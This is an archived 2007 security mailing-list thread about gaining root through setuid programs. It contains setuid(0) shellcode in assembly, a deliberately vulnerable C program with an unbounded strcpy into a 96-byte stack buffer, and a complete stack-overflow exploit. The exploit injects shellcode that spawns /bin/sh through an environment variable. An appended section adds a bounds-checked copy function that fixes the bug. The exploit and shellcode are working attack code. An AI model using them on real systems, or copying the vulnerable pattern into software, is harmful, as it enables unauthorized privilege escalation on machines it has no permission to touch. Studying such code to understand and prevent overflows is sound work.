Re: question on escalating privileges via suid vulnerabilities

From: John McGuire (jmcguire81@gmail.com)
Date: Wed Feb 28 2007 - 14:20:43 EST


Here is the assembly I finally came up with for this. It shaves off a
byte if space is critical:

//setuid(0), Opcode 17
"\x31\xdb"     // xorl %ebx,%ebx        // ebx = 0 (uid argument)
"\x8d\x43\x17" // leal 0x17(%ebx),%eax  // eax = ebx+0x17 = 23 (setuid)
"\xcd\x80"     // int $0x80

John

On 2/27/07, Fábio Russo <fabio.contin.russo@gmail.com> wrote:
>
> >Try with "setuid(0);" before execve :-)
> >--
> >Andrea "bunker" Purificato
> >+++++++++++[>++++++>+++++++++++++++++++++++++++++++++>++++
> >++++++<<<-]>.>++++++++++.>.<----------.>---------.<+++++++.
> >
> >http://rawlab.mindcreations.com
>
> Hi.
> Some applications need a setuid(0) before the /bin/sh string because
> it has the suid bit set.
> See the example below:
>
> // bugged program with setuid bit set and root privileges:
>
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
>
> int main(int argc, char **argv) {
> char env[96];
>
> // Shows the return address for exploiting
> printf("- %p -\n", &env);
> // Unbounded copy of the environment variable into the 96-byte stack buffer
> strcpy(env,getenv("BOLINHA"));
> return(0);
>
> }
>
>
>
> //exploit: usage ./exploit <bugged_program> <return addr>
>
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <unistd.h>
>
> extern char **environ;
> char shellcode[]="\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
>
> int main(int argc, char **argv)
> {
> char string_longa[128];
> long *ptr = (long *) string_longa;
> int i;
>
> // fill the buffer with the return address, then put the shellcode at its start
> for(i=0; i<32; i++) *(ptr + i) = (int) strtoul(argv[2],NULL,16);
> for(i=0; i<(int) strlen(shellcode); i++) string_longa[i]=shellcode[i];
>
> setenv("BOLINHA", string_longa, 1);
> execle(argv[1], argv[1], NULL, environ);
> printf("%s\n", string_longa);
>
> return (0);
>
> }
>
> Taking a close look at the exploit source code we can see that
> the first bytes in the shellcode are the setuid(0),
> more precisely the \x31\xc0\x31\xdb\xb0\x17\xcd\x80.
> This is needed to get a root shell.
> If you cut those bytes off from the shellcode, you will get a shell
> that belongs to the user who executed the exploit.
>
> I hope it can be useful for someone. :-)
>
> bye.
>
>
> ------------------------------------------------------------------------
> This List Sponsored by: Cenzic
>
> Need to secure your web apps?
> Cenzic Hailstorm finds vulnerabilities fast.
> Click the link to buy it, try it or download Hailstorm for FREE.
>
> http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW
> ------------------------------------------------------------------------
>
>

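The bounds-checked replacement for the bugged program's strcpy(env, getenv("BOLINHA")), added here as an example and not code from either poster: copy_value_checked, copy_env_checked and demo_case are hypothetical names, and the runs of 'A' bytes are constructed input. It refuses an unset variable (where strcpy would fault on NULL) and any value that has no terminator inside the 96-byte buffer, which is the case the exploit above relies on.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ENV_BUF 96  /* same size as the bugged program's env[96] */

/* Bounded replacement for strcpy(env, getenv("BOLINHA")): returns 1 and copies
 * val plus its terminator into out when it fits, 0 when val is NULL or has no
 * terminator within out_len bytes. Never writes outside out[0..out_len-1]. */
int copy_value_checked(const char *val, char *out, size_t out_len)
{
    size_t n = 0;
    if (val == NULL || out_len == 0)
        return 0;                  /* unset variable: strcpy would fault on NULL */
    while (n < out_len && val[n] != '\0')
        n++;                       /* scan at most out_len source bytes */
    if (n == out_len)
        return 0;                  /* no terminator in range: value would overflow */
    memcpy(out, val, n + 1);       /* n bytes plus the NUL */
    return 1;
}

/* Same check applied to an environment variable looked up by name. */
int copy_env_checked(const char *name, char *out, size_t out_len)
{
    return copy_value_checked(getenv(name), out, out_len);
}

/* Hypothetical helper: a value of `len` 'A' bytes (constructed input;
 * len == 0 stands for "variable unset") run through the check. */
int demo_case(size_t len)
{
    char env[ENV_BUF];
    char *val = NULL;
    int ok;
    if (len > 0) {
        if ((val = malloc(len + 1)) == NULL)
            return -1;
        memset(val, 'A', len);
        val[len] = '\0';
    }
    ok = copy_value_checked(val, env, sizeof env);
    free(val);
    return ok;
}
```

A 95-byte value is the longest the buffer accepts; 96 bytes or more, or an unset variable, is rejected instead of overwriting the saved return address.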



This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:57:37 EDT